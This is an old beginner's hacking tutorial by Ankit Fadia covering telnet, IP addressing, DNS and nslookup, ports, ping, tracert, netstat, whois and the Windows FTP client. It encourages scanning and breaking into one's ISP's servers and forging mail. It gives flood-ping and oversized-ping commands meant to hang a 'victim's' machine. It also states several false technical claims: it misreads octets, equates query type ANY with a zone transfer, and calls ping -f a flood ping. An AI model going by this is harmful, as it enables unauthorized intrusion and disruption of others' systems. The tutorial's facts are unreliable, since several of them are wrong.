The Hacking Truths Manual----Net Tools The 2nd Edition

By Ankit Fadia ankit@bol.net.in

Now that you know how to control the working of the Windows operating system lets go on to the basics of using Internet tools which are really really useful for hacking.

Well to tell you the truth, Hacking would be much more easy if you were running some sort of Unix on your machine or if you had a shell account. I am writing this guide keeping in Mind the Newbies who are probably stuck with Windows and I am pretty much sure that all those of you who are Linux Geeks will have no problem in figuring out doing the sam ething in Linux.

There is a common belief amonst people that Windoze is very insecure and it sucks but then on the other hand Red Hat too is not so great in the security sphere. There are nearly 50 known exploits to get root on a Linux box. The reason why hackers have found so many holes or bugs in Windows is due to the fact the Windows is the most widely used OS in the world and the largest number of Hackers have access to Windows and the largest number of people have a go at Windoze's Security.

The only thing that is in support of Linux is the fact that it is free and the concept of Open Source and well,performance. What I want to say is that Linux's performance may be better but I do not agree to what all people say about the low Windoze security.So what I think is that there is nothing wrong in Using a Windoze box for Hacking. Yes Linux does provide you access to some kewl hacking tools from the various shells but for Windows there are many third party freebies that allow you to do the same thing. Linux does make hacking easier but there is nothing wrong in using Windows for Hacking.But for all those of you who think otherwise you can and if your ISP does not give shell account you can use your Dial Up PPP account to login into a third party shell acount.To get a free shell account goto www.cyberarmy.com or www.hobbiton.org Their service is pretty good.

Telnet

Telnet is the ultimate hacking tool which every hacker must know how to use before he can even think about Hacking into servers. Telnet is better described as a protocol which requires or runs on TCP\IP.

It can be used to connect to remote computers and to run command line programs by simply typing commands into it's GUI window. Telnet does not use the resources of the client's computer but uses the resources of the server to which the client has connected. Basically it is a terminal emulation program that allows us to connect to remote computers. It is found at

c:\windows\telnet.exe

in Win9x systems and

c:\winnt\system32\telnet.exe in NT machines.

If the Path statement in your machine is set correctly then if you just type Telnet at the DOS prompt then it will bring a GUI Windows which actually is the Telnet program.

How do I connect to remote computers using telnet?

Well it is really simple to connect to remote computers using telnet.Well first launch the telnet application by typing telnet at the DOS prompt. Once the Telnet windows pops up click on Connect>Remote System then in the host name type the host i.e the remote computer you want to connect to. Then in the Port select the port you want to connect to in this case leaveit to Telnet. Almost always leave the TermType to vt100.

***********************

Hacking Tip: You may be wondering what the Term Type stands for. Well actuallyit represents various kinds of display units. We use vt100 as it is compatible with most monitors.

**********************

Then click connect and you will be connected to the remote machine.

Now if you are a newbie you would be using the above method of telnetting to a remote computer and you would not be port surfing. Well if you really want to leanr to hack, port surfing is a must as without learning to port surf you will not be able to find out.

The basic syntax of the telnet command is

C:\>telnet hostname.com

Now let's go through this syntax, the word telnet is followed by the host name or the IP address of the host you want to connect to which is then followed by the port on the remote computer you want to connect to.If you are confused by the new terms read on and things will become clearer.

What exactly is an IP Address?

Like in the real world, everyone has got an individual Home Address or telephone number so that, that particular individual can be contacted on that number or address, similiarly all computers connected to the Internet are given a unique Internet Protocol or IP address which can be used to contact that particular computer. In geek language an IP address would be a decimal notation that divides the 32 bit Internet addresses (IP) into four 8 bit fields.

Does the IP address give me some information or do the numbers stand for anything?

Let take the example of the following IP address: 202.144.49.110

Now the first part , the numbers before the first decimal i.e 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which thehost is.

The second part i.e. 144 is the Host Number, that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibilty in the size of the Network, there are different classes of IP addresses:

Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx

The various classes will be more clear after reading the next few lines.

Each Class A Network Address contains a 8 bit Network Prefix followed by a 24 bit host number.They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have a 8 bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16bit Host number. It is reffered to as "16's".

A class C Network address conatins a 24 bit Network Prefix and a 8 bit Host number. It is refered to as "24's" and is commonly used by most ISP's.

Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site.

This is where subnetting came in. Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when subnetting comes in then the IP Addresses structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain same and only the last part i.e. yyy is variable.

You may be wondering, what happeded to 127 as after 126.xxx.xxx.xxx there is straightaway 128.0.xxx.xxx.

Well 127.0.0.1 is reserved for the loopback function, this means that it refers to the localhost, this means that if you try to telnet to 127.0.0.1 , then the Telnet client will try to connect to your own computer.

IP addresses can be of two types: Dynamic and Static.

Now most of us connect to the Internet by dialing into our ISP through Dial up Networking and using PPP(Point to Point Protocol). Now when you connect to your ISP's server you are assigned a unique IP number which is then used to transfer data to and from your computer. That becomes your address. Now the IP address that you are assigned changes everytime your connect to your ISP i.e. you are assigned a new different IP every time you dial into your ISP, that is how it becomes Dynamic.This means that if you have obtained the IP address of a person once, then if he disconnects and reconnects then you will have to get his IP address again. While other ISP's provide you with a permanent IP address as soon as you register with them. In that case your IP remains the same every time you connect to their server and is thus known as a permanent IP address.

*******************

Hacking Tip: You can find out if an IP address is a Dynamic or Static by issuing the ultimate mapping tool on the net: nslookup.Give the following command : nslookup hostname where hostname is substituted by an IP address and if the result is Non-Existant Host/ Domain then the IP is a Dynamic one. If it return the hostname which is human understandable then you can be pretty sure that the IP address is a static one.

For more information on DNS lookup and nslookup read on.

******************

Now IP addresses are very difficult to remember, who can memorize IP addresses of all the computers he wants to connect to or the sites he wants to visit.Say for example I am sure you would find hotmail.com more easier to remember than something like 203.43.54.12. Here comes in DNS or Domain Name Systems.Read on for more info on DNS.

DNS

A DNS is basically a resource for converting friendly Hostnames (like, hotmail.com)which humans can easily understand, into IP addresses which machines need to communicate to the host i.e. hotmail.com

Now what basically happens in that when you type www.hotmail.com in the location bar of your browser, the browser needs to perform a lookup to find the machine readable IP address so that it can communicate with the host.This means that the browser cannot communicate with a host if it has the friendly hostname only.

Without the IP address, no communication can take place. So for the lookup, the browser contacts the DNS server setup by normally by your ISP and through the resolver tries to look for the IP conversion of the hostname the user wants to contact.

A DNS server is basically a server running DNS software.The server that the browser first looks for a translation is the Primary DNS server, if this primary server doesn't show any match then this server contacts another DNS server somewhere on the Internet (This becomes the SecondaryDNS Server)and looks for a match. If a match is found in the secondry server then the Primary server updates it's database so that it doesn't have to contact the Secondary server again for the same match.

Each DNS server stores the hosts it has recently looked for in it's cache. Now if the Server has recently looked for a particular hostname, then it does not search for it again but just provides the browser with that information from it's cache. If the cache does not contain a particular entry, then the resolver looks for the desired entry by searching through the entire database.

New techologies are being introduced in the DNS sphere. Now take the case of amazon.com. It is a famous and large E-company with over a million users per day.(My rough estimate.) Such large organizations have multiple IP addresses for the same domain name. Today what happens is that the DNS server returns all IP Addresses and the browser chooses a random IP from it. But this new technology will allow the DNS server to return the IP of the server which has the least trafiic, so as to enhanse surfing. So you can see DNS does make sense.

You can see how time consuming the above process can be and it can really slow down your surfing process, a lot of time is being wasted when the browser contacts the DNS server and performs a lookup, so how do you fasten this process? How do you eliminate the fact that the browser will contact the DNS server each time you want to visit a site? Well the answer lies in the HOSTS file hidden in the c:\windows directory.

You can map a machine's IP to any hostname by editing the c:\windows\hosts file(it has no extension.)on win 9.x systems. On NT the hosts file is c:\WinNT\system32\drivers\etc\hosts

And on Linux it is /etc/hosts.

A hosts file looks something like the below:

###############################

# Copyright (c) 1998 Microsoft Corp.

#

# This is a sample HOSTS file used by Microsoft TCP/IP stack for Windows98

#

# This file contains the mappings of IP addresses to host names. Each

# entry should be kept on an individual line. The IP address should

# be placed in the first column followed by the corresponding host name.

# The IP address and the host name should be separated by at least one

# space.

#

# Additionally, comments (such as these) may be inserted on individual

# lines or following the machine name denoted by a '#' symbol.

#

# For example:

#

# 102.54.xx.97 rhino.acme.com # source server

# 38.25.63.10 x.acme.com # x client host

1. localhost

#####################################

For example, if you know that the IP address of say hotmail.com is 207.xxx.xxx.xxx., then if you add the following in the Hosts file then the browser will not perform a lookup and will straightaway have the IP to communicate with the host. So add the line:

207.xxx.xxx.xxx www.hotmail.com

Now your browser will connect faster to Hotmail.com. This technique can increase your surfing speed tremendously.So now that you know what a DNS is...let get on to the subject of DNS lookup and Reverse DNS lookup.

Now Linux or any other form of Unix come with a very interesting utility known as nslookup. This can be used to gather some very valueable information about a host. For details as to how to use this tool to gather information read the man pages. Windows users can download SamSpade from www.samspade.org to perform a nslookup.

Just as DNS lookup converts the hostname into IP address, a Reverse DNS Lookup converts the IP address of a host to the hostname thus we can conclude that a DNS lookup return machine readable IP addresses and a reverse DNS Lookup returns the human friendly hostname.

****************************

INFO: The DNS software normally runs on Port 53 of a host. So the browser connects to port 53 to perfom a DNS lookup.

***************************

NslookUp

So how can you use nslookup to gain some valuable information about a host? Well the best way to learn about a particular Unix command is to read the man pages.They are the ultimate source of all Unix commands and their parameters.

Now the first thing to do is, either get SamSpade from www.samspade.org or if you are using a shell account or are running any form of Unix then locate where the nslookup command is hidden by issuing the following command: ' whereis nslookup '.

I am just giving you a general introduction to nslookup, to meanr about all Resource records or query types do read through the Man pages. You can use nslookup in two modes, either in the interactive mode or in the non interactive mode.First I will explain the Interactive mode. If you type nslookup at the shell prompt then it launches say, the nslookup utility or the nslookup command.

$>/usr/etc/nslookup

Default Server: hobbiton.org

Address: 12.12.12.12

Now when you type just nslookup, the machine will return the IP address and the name of the server which is running the nslookup command for you,in this case it would be my shell account provider. Now once launching nslookup you need to specify the query type, which is thetype of Resource Record (RR) by typing:

set type: RR

where RR can be any of the following:

A : Address

MX : Mail Exchanger

PTR : Pointer

CNAME: Canonical Name

HINFO: Host Info.

ANY : In this case a zone transfer takes place and all information of the host is returned, as a result additional burden is put on the host and hence may cause the host to hang or restart.

NOTE: To get full list of RR's read the man pages.

Now once the RR or the type has been set, you need to type in the host name or the IP of the server you want to gather info of. This might not be that clear, so let me take you through an example.

Firstly for this example I am using my Linux box and am not logged on to any shell account so my IP would be 127.0.0.1 and am doing a A type nslookup on the host hotmail.com

$>nslookup

Server: localhost

Address: 127.0.0.1

>set type=A

>hotmail.com

Server: localhost

Address: 127.0.0.1

Note: I have typed whatever is after > and other lines are written by the computer.

This will return the address info of the host hotmail.com. Do try it out and see what you get. Now if we want to run nslookup in Non Interactive Mode, then we have to write the command in the following format:

$>nslookup Hostname

Now in all the above examples, we did a normal DNS lookup on the host. We can also use nslookup to perform a reverse DNS lookup by instead of mentioning the Hostname, by mentioning the IP of the host.

Eg.

$>nslookup IP address

Now that you have understood the whole concept of DNS you know what happens when we issue the /dns command in IRC.

There is yet another Unix utility or command called DIG or Domain Information Groper which too like nslookup gives info on the host. It too is a part of SamSpade.

Ports

Now that you no what an IP is and what DNS or the hostname is, lets move on to Ports.

There are basically two kinds of ports--Physical(HardWare) and Virtual (Software) You may be knowing ports to be the slots behind your CPU to which you connect your Mouse or Keyboard or your monitor. Well they are physical Hardware real ports.The ports we Hackers are interested with are virtual software ports.

A port is a virtual pipe through which information goes in and out. A particular computer can have a large number of ports. All ports are numbered. Now at each port a particular service is running. A software which runs on a port is called a service. So how do you know which service is running on which port. Well all ports are numbered and there is a general rule which almost everyone follows which decides which service usually runs at

Which port.

Some popular ports and services running are:

Ping 7

Systat 11

Time 13

NetStat 15

SSH 22 (This is same as Secure Shell Login)

Telnet 23

SMTP 25

Whois 43

Finger 79

HTTP 80

POP 110

NNTP 119

rlogin 513 (IP Spoofing can be used here.)

To get an entire list of port numbers and the corressponding service running at that particular port, read RFC1700 .

Ports under 1024 usually have popular well known services running on them. The higher port numbers are used say, when your browser needs to connect to a remote server maybe when the browser connects to port 80 of the remote server and requests for the default webpage. So in these cases the browser chooses a random port above 1024.

************

Newbie Note: What the hell is a RFC? Well RFC stands for Request For Comment.

They are texts which cover each and every aspect of Networking and the Internet. They are written by geeks and if you want to become an uberhacker then you will have to by hear all RFC's. All these new terms and the whole TCP\IP protocol may sound weird and difficult to grasp but if you want to be a good hacker then you will have to stay with them the rest of your lives.To locate a RFC just go to your fav search engine and type the RFC number.

*************

*************

NewBie Note:

What is a Daemon?

Well a daemon is a program that runs in the background at many Unix ports.

If you find a service or a daemon running at a port, I am sure that computer is hackable.

*************

Port Scanning & Port Surfing

Now that you know everything about Telnet and have some basic Networking knowledge lets have some fun by learning to Port Surf. It is the first basic step in finding a hackable server running a daemon with a hole or a vulnerability.

Say you want to hack into your ISP's server, what do you do? You firstly find out the hostnames of the servers runned by your ISP. Now each server can have a large umber of open ports and it would take days to manually go to each port and then find out that no service is running at that port. So here come in the Port Scanning Utilities which give a list of open ports on a server. Some port

scanners alongwith the list of open ports also gives the services running on each port and it's vulnerabilties, if any.

Now port scanning takes advantage the 3-stage TCP handshake to determine what ports are open on the remote computer. To learn more about the TCP\IP protocol read the networking manuals that I distribute on

my mailing list.

Tools like SATAN and lots of them more allow you to find out the list of open ports, the daemon or the service running at each open port and also the service's vulnerability at the click of a button. You can't call yourself a hacker if you need some Software which first of all is not written by you to do something as lame as a port scan. Well yes I do agree that looking for open ports on a server would take a long time. But what I am suggesting is that you use a Port scanning tool which just gives you a list of open ports without the list of services and the vulnerabilities. I assure you, if you try and explore an open port of a remote server manually, you will be able to learn more about the remote system and also it will give you a taste of what hacking actually is. If you use a port scanner which gives you all details at the click of a button to impres your friends, let me assure you none of them will be impressed as I am sure anyone can use SATAN and other such scanners.

Another thing you need to be careful about before port scanning your ISP is that most port scanners are very easily detected and can easily be traced and you have no excuse if you are caught doing a port scan on a host., it a sure sign of Hacker Activity.There are many stealth scanners like Nmap which claim to be untraceable. But the truth is that they are very much traceable and they are quite inaccurate as they send only a single packet to check if a port is open or not. And if the host is running the right kind of Sniffer software maybe Etherpeek then the Port scan can be easily detected and the IP of the user logged. Anyway some ISP's are really afraid of Hacking activites and even at the slightest hint of some suspicious hacking activity something like Port scanning, they can remove your account. So just be careful.

************

Evil Hacking Trick: Well try to keep an eye on TCP port 12345, and UDP port 31337 these are the defaultports for the popular trojans NetBus and BO, respectively

*************

Some ISP's are quite aware of Hacking Activites and are one step ahead. They may be running some excellent software which will keep hackers away. EtherPeek is an excellent example of a sniffing software which can easily trace users who are port scanning. Nuke Nabber a Windows freeware claims to be able to block Port Scans. I have not tested it so I can't say for sure. Then there is another fun program known as Port Dumper which can fake daemon( services) like Telnet, Finger etc.

How can I find out my own IP address and what ports are open on my machine?

All this talk about IP's and ports may have made you quite interested in this subject and you may be dying to find out a method of finding out open ports on your machine and your own IP address.

Well just type the following at the DOS prompt (Windows users) or the bash prompt (Unix users): netstat -a

This will return something like the following:

C:\WINDOWSnetstat -a

Active Connections

Proto Local Address Foreign Address State

TCP ankit-s-hax-box:1030 0.0.0.0:0 LISTENING

TCP ankit-s-hax-box:1033 0.0.0.0:0 LISTENING

TCP ankit-s-hax-box:1027 0.0.0.0:0 LISTENING

TCP ankit-s-hax-box:1030 mail2.mtnl.net.in:pop3 ESTABLISHED

TCP ankit-s-hax-box:1033 zztop.boxnetwork.net:80 CLOSE_WAIT

TCP ankit-s-hax-box:137 0.0.0.0:0 LISTENING

TCP ankit-s-hax-box:138 0.0.0.0:0 LISTENING

TCP ankit-s-hax-box:nbsession 0.0.0.0:0 LISTENING

UDP ankit-s-hax-box:1027 *:*

UDP ankit-s-hax-box:nbname *:*

UDP ankit-s-hax-box:nbdatagram *:*

 

Sockets and Ports Explained

Note: I am assuming that you have at least some knowledge about TCP\IP.

What is all the hype about socket programming? What exactly are sockets?

TCP\IP or Transmission Control Protocol\ Internet Protocol is the language or the protocol used by computers to communicate with each other over the Internet. Say a computer whose IP address is 99.99.99.99 wants to communicate with another machine whose IP address is 98.98.98.98 then would will happen? The machine whose IP is 99.99.99.99 sends a packet addressed to another machine whose IP is 98.98.98.98. When 98.98.98.98 receives the packet then it verifies that it got the message by sending a signal back to 99.99.99.99. But say the person who is using 99.99.99.99 wants to have simunateously more than one connections to 98.98.98.98.....then what will happen? Say 99.99.99.99 wants to connect to the FTP daemon and download a file by FTP and at the same time it wants to conect to 98.98.98.98's website i.e. connect to HTTP daemon. Then 98.98.98.98. will have 2 connects with 99.99.99.99 simountaneously.Now how can 98.98.98.98. distinguish between the two connections...how does 98.98.98.98. know which is for the FTP daemon and which for the HTTP daemon? If there was no way to distinguish between the two connections then they would both get mixed up and there would be a lot of chaos with the message meant for the HTTP daemon going to the FTP daemon. To avoid such confusion we have ports. At each port a particular service or daemon is running by default. So now that the 99.99.99.99 computers knows which port to connect to, to download a FTP file and which port to connect to, to download the web page, it will communicate with the 98.98.98.98 machine using what is known as the socket pair which is a combination of an IP address and a Port. So in the above case the message which is meant for the FTP daemon will be addressed to 98.98.98.98 : 21 (Notice the colon and the default FTP port suceeding it.).

So that the receiving machine i.e. 98.98.98.98 will know for which service this message is meant for and to which port it should be directed to. In TCP\IP or over the Internet all communication is done using the Socket pair i.e. the combination of the IP address and the port.

DOS Hacking utilities shipping with Windows and Linux Utilities too.

Most Hacker Friendly utilities that ship with Windoze are hidden and a normal

user will not be able to find them.All of them are either in the c:\windows directory or are in the Windows Installation CD.

PING

Now lets start with what exactly Ping is. Now Ping is a part of the ICMP protocol i.e the Internet Control Message Protocol. ICMP is a protocol used to troubleshoot TCP\IP networks. Ping is a command which sends out a datagram to the specified host. This specified host if alive i.e. turned on sends out a reply or echos off the same Datagram. If the datagram that reaches back to your computer has the same datagram that was sent then it means that the host is alive. So Ping is basically a command which allows you to check if a host is alive or not. It can also be used to calculate the amount of time taken for a datagram to reach the host. It is so deadly that it can be used to ping a hostname perpetually which may even cause the host to crash. Now what happens is that when a host receives a Ping signal, it allocates some of it's resources to attend to or to echo back the datagram. Now if you Ping a host perpetually, then a time will come when all resources of the host are used and the host either hangs or restarts. Due to Ping's deadly nature, most shell account ISP's hide the Ping utility. To find it issue the following

command:

whereis ping

It is usually hidden in /usr/etc

Ping has many parameters and a list of parameters can be found by reading the man pages or if you are running Windows you can get help by simply typing ping at the DOS prompt.

The flood ping which pings a host perpetually is:

ping -f hostname

ping -a hostname can be used to resolve addresses to hostnames.

When I typed ping at the dos prompt I go the following help:

C:\WINDOWS>ping

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]

[-w timeout] destination-list

Options:

-t Ping the specifed host until stopped.

To see statistics and continue - type Control-Break;

To stop - type Control-C.

-a Resolve addresses to hostnames.

-n count Number of echo requests to send.

-l size Send buffer size.

-f Set Don't Fragment flag in packet.

-i TTL Time To Live.

-v TOS Type Of Service.

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.

-w timeout Timeout in milliseconds to wait for each reply.

You can even Ping yourself. Earlier I had told you guys that the IP 127.0.0.1 is

the local host, this means that when you connect to 127.0.0.1 then you actually connect to your own machine.

So to ping yourself perpetually , issue the following command:

ping -f 127.0.0.1

Well actually the Flood ping no longer works on most OS's as they have be updated.

The following Ping command creates a giant datagram of the size 65510 for Ping. It might hang the victim's computer.

C:\windows>ping -l 65510

Tracert

When you type hotmail.com in your browser, then your request passes through a large number of Computers before reaching hotmail.com. Or when you login to your Shell account and type the password then this password passes through a large number of computers before reaching the shell account server.

To find out the list of servers your password of the request passes through, you can use the tracert command. In Unix you can use the traceroute command. Again I got help by simply typing tracert at the DOS prompt.

C:\WINDOWS>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout]

target_name

Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.

Lets take an example of tracing the path taken by a datagram to reach hotmail.com from your machine. To do this simply type the following command:

C:\windows>tracert hotmail.com

 

Instead of Hotmail.com you can also write the IP address of Hotmail.com which you can get by doing an nslookup. Try tracert with different parameters and see what the result is. That is the best way to learn how this command works.

Netstat

This is by far the most interesting hacking tool which gives some important information about your ISP. Netstat doesn't display any help information unless you type netstat /?. I got the following info:

C:\WINDOWS>netstat /?

Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.

-e Displays Ethernet statistics. This may be combined with the –s option.

-n Displays addresses and port numbers in numerical form.

-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.

-r Displays the routing table.

-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.

The -a parameter can be used to list the open ports on your computer and your IP address. I have explained it in the IP address section.

For example,

C:\windows>netstat -a

Will display the Kernal Routing Information, ports open on your machine, your IP, the IP of the host you are connected to and also the port of the host to which you are connected to.

If you are logged into your shell account and give the netstat command then it may give the IP addresses of all people who are logged into that server at that moment. All these IP's are Dynamic of course.

Another intersting command is the nbtstat command which too is a great tool to get excellent valuable info on a host your are connected to. For more info type nbtstat at the prompt.

C:\windows>nbtstat -A <host>

The above-mentioned command will allow the hacker to obtain a list of usernames, system names, and domains.I will mention more about this command in the Hacking Truths Manual on File Sharing.

Arp and Route are really advanced comamnds which I do not think should be mentioned in a newbies manual. But all of you who want more info on any of these commands can either try simply typing the name of the command or the command name followed by /?

Eg

Command /?

Will display help on the command.

**********************

Hacking Tip: ARP (Address Resolution Protocol) is used to translate IP Addresses to Ethernet addresses. The translation is done only for outgoing IP packets, because this is when the IP header and the Ethernet header are created. IP address Ethernet address 1. 08-00-39-00-2F-C3 Route is used to display info on the routing tables.

**********************

WHOIS: Getting Info about a Domain

How do you get a .com registration? Well you register with Network Solutions give them some money and you have your own domain name i.e. your very own .com registration. Now all people who register with Network Solutions have to fill a form in which they have to enter information like Name, Contact Information, Email Address, IP address and much more. Now all this data or info is stored in a DataBase mentained by Network Solutions. You can perfom a query which is known as a Whois query and gather information on a particular domain or host. Say you want to find out the IP or the name of the person who owns the www.hotmail.com domain,what do you do?

Well either you could go to Network Solutions site or internic.net and enter hotmail.com in the input box or you can directly enter the following in the location bar of your Browser and make a whois enquiry.

Enter the following in the location bar of your browser:

http://205.177.25.9/cgi-bin/whois?hotmail.com

Note: Replace Hotmail.com with the domain name of which you want to perfom a

WHOIS query.

Manual Port Surfing

You have obtained the list of open ports by using some canned hacking tool. Now what do you do? Connect to each port of the remote server i.e. your ISP. Now earlier I taught you a lame method of telnetting to a remote server. Now lets get to an cool method of connecting to a remote computer.You are not a Hacker if you do not telnet like this:

C:\windows> telnet hostname.com ###

Well this command is pretty much self explanatory. Telnet calls the telnet program, Hostname is the hostname or the IP of the remote server and ### is the open port of the remote server you want to connect to.

It is not necessary that as port 25 is normaly the SMTP port, each and every server would be running SMTP at port 25. It all varies from Server to server. If you learn Port surfing then

you can connect to the FTP (21) daemon and download or upload files, connect to SMTP daemon and send mail even forged mail, POP (110) to receive mail and HTTP (80) to download web pages.

OK get ready to explore the most common ports which are likely to be open on your ISP's servers. Port 23 is the default port to which Telnet connects to if the port number is not given. Generally when we are connected to Port 23 of the remote server then we are greeted by a Welcome Banner and then we are given the Login Prompt. Generally connecting to Port 23 also gives the Name of the OS running at the remote server which is invaluable in finding exploits as a particular exploit may work only if the remote computer is running the same combination of service and Operating System.

Basically connecting to Port 23 gives us the OS of the remote computer. WIN 95/98/NT don't ship with telnet servers so unless the telnet server is installed Port 23 would no be open. So if Port 23 of your ISP is not open then it should be safe to think that the server is not runnign Win 95/98/NT. But you can never be sure just maybe your ISP has installed a telnet server and is running Windows.

Nowdays almost none of the ISP's keep Port 23 open as the number of Hackers has really increased. Now lets move on to Port 21 or the FTP Port. Do you use Cute FTP or some other FTP client? Ever wondered how it works?

FTP or Port 21 Explained

First of all FTP stands for File Transfer Protocol.To read geek stuff on the FTP protocol read RFC 114 and RFC 959.

FTP or File Transfer Protocol is a Protocol used to transfer files from a server to a client. Now a server would be the computer you are connected to and the client would be you yourself.

To connect to a FTP server we need to have a FTP software known as the FTP client.This basically is protocol popular for tranfering files from the server to the client or vis-a-versa.So we can say that FTP servers will allow you to download and also upload files.

LIST OF FTP SERVERS

Unix FTPD

Win9x WFTPD, Microsoft Frontpage

Win NT IIS

Mac FTPD

Well it is really a simple process of FTP'ing to your favourite site. Infact Windows itself ships with a FTP client which is quite lame and I do not at all recommand it, but still what the heck. How FTP is actually quite self explanatory, now the FTP Client i.e the program that you run at your computer first contacts the FTP daemon (Service running at Port 21) on the server specified, if the Server has a FTP daemon running then you might get a welcome screen which is also known as the Daemon Banner. A daemon Banner would be something that either displays a welcome message and info on the OS or service running on the host you have FTP'ed to.A daemon banner gives us valuable info on the host we connect to.Just remmember that if we want to get root or break into a FTP server then we need to search for a hole we can exploit, and to search for a hole which we can exploit, we need to know the OS, the OS version and also the version on the FTP server running by the host. This means that say there is a FTP server which has 2 versions, one that runs in Windows and the other that runs in Unix. If say the Unix version has a hole, then it is not necessary that the Windows version too would have the same hole. A hole exists due to the combination of the Server running at the OS running at the host. This means even if the OS is different but the FTP server is the same, the hole would not work.So before you start to look for holes in the FTP server running at your ISP, just note down the OS version and the FTp server version running at your ISP.The daemon banner is followed by the Password Prompt. Something like the Following:

Connected to web2.mtnl.net.in.

220-

220-#*************************************************************

220-# Welcome to MTNL's ftp site

220-#*************************************************************

220-#

220-# You can upload your own homepages at this site!!!

220-#

220-# Just login with your username and upload the HTML pages.

220-# (You can use your favourite HTML editor as well)

220-#

220-# World will see it at http://web2.mtnl.net.in/~yourusername/

220-#

220-# So get going......UNLEASH YOUR CREATIVITY !!!!

220-#

220-#*************************************************************

220-

220 ftp2.mtnl.net.in FTP server ready.

User (web2.mtnl.net.in:(none)): ankit

331 Password required for ankit.

Password:

Now most FTP daemons are badly configured, well actually I should say the system administrators allow Guest or anonymous Logins. What I mean by that is the FTP Daemon allows you to enter Guest or Anonymous as the Username. If you login through the Guest account, then it asks you for your email address, so that it can add to the server logs that you visited that site and used the FTP Daemon.

Here instead of your true email address, you can make one up in your mind, just remember to put the @ sign in between and of course no spaces.

So How Do I use the Windows FTP Client?

Well first of all I think the FTP client which ships with Windows is not a GUI application.I personally do not like it and think you should either use your Favourite FTP Client or use the Telnet Application that ships with Windows to connect to Port 21.

Anyway for those of who are die hard Microsoft fans or want to learn each and every thing in Windows, I will explain how this FTP Client is used. Actually this FTP program is quite powerful and it makes Hacking cool. If you use a GUI FTP program for hacking to impress your friends then they would probably say that anyone can use a GUI. This Windows FTP program may seem formidable to some at first sight.

Now first of all goto MS DOS to run this program as it runs in DOS. Now type

FTP

to launch it.

C:\WINDOWS>ftp

Your prompt will change to

ftp>

This is the FTP prompt and signifies that the FTP Client has been launched and is running.

Now to transfer files or to do some FTP Hacking you need to know the FTPcommands. To get a list of FTPcommands type Help at the FTP prompt.

ftp> help

Commands may be abbreviated. Commands are:

! delete literal prompt send

? debug ls put status

append dir mdelete pwd trace

ascii disconnect mdir quit type

bell get mget quote user

binary glob mkdir recv verbose

bye hash mls remotehelp

cd help mput rename

close lcd open rmdir

ftp>

You may get something like the above on your screen.Instead of typing Help you could also type ? that too would give the same result. Now to get Help on individual Commands type the following:

ftp>help [command]

Like say for example, I want to learn how to use the cd command what it does then I type the following:

ftp>help cd

The FTP program will return this:

cd Change remote working directory

Note: Instead of the Above I could also have typed: ftp>? Cd

Different FTP Commands:

Now the Get command is used to get files from the server you are connected to.

ftp>get file.txt

This will get or download the text file with the name file. To download multiple files one cannot use the get command. The mget or the multiple gets command is used instead.(the m in mget stands for multiple) For example the following gets all text files from the host,

ftp>mget *.txt

Say you want to upload a single file then you use the put command and to upload multiple files use the mput command.

Say you are working in the Windows Directory and want to change to the c:\windows\temp directory while you are in the process of uploading files, so change the local directory use the lcd command.

For example,

ftp>lcd temp

This will make temp the current local working directory.

The Bye or Close commands are basically terminating commands.The ! commad allowsyou to escape to the shell at any moment.

Another interesting command is the SYST command which gives us information on the server's OS and FTP server's version etc.This is excellent to get info on the host's OS version and FTP daemon's version, so that you can search for it on the net.

For a single line description of each command use the help or the ? command followed by the command you want info on.

Now that you know some of the Basic FTP commands let me take you through the process of uploading your site to your ISP's server. I am assuming that your ISP's hostname is isp.net and all the files that have to uploaded to the ISP's server are in the directory c:\Site

First lets start my connecting or FTP'ing to your ISP. There are 2 ways to start a FTP session.First way is to pass an argument along with the Ftp Command i.e. you can directly connect to ahost by typing ftp followed by the hostname. The second method involves firstly the launching of the FTP client and then using the Open command to connect to the host. Fot more info on the open command type help open

For Example,

C:\windows>ftp isp.net

Or

C:\windows>ftp

ftp>open isp.net

In most cases after you have connected to the host i.e your ISP you will see the Welcome Banner of your ISP and then it will ask for a username and a password. Enter them. If you do not have them then try the Anonymous or the Guest Login or read on to learn to Hack into a FTP server. Anyway getting back to the uploading of the website. Now remember that the files you want to upload are in the c:\site directory but the current local working directory is Windows( It is normally the Default Directory in which MS DOS would open,) So before starting to upload files you need to change the Local working directory from c:\windows to c:\site. So to this use the lcd command.

For Example,

ftp>lcd c:\site

Now you are set to upload the files, I am assuming that all files in the directory need to be uploaded, if that is not the case then use the WildCard " * " symbol and make the necessary selections.

ftp>mput *.*

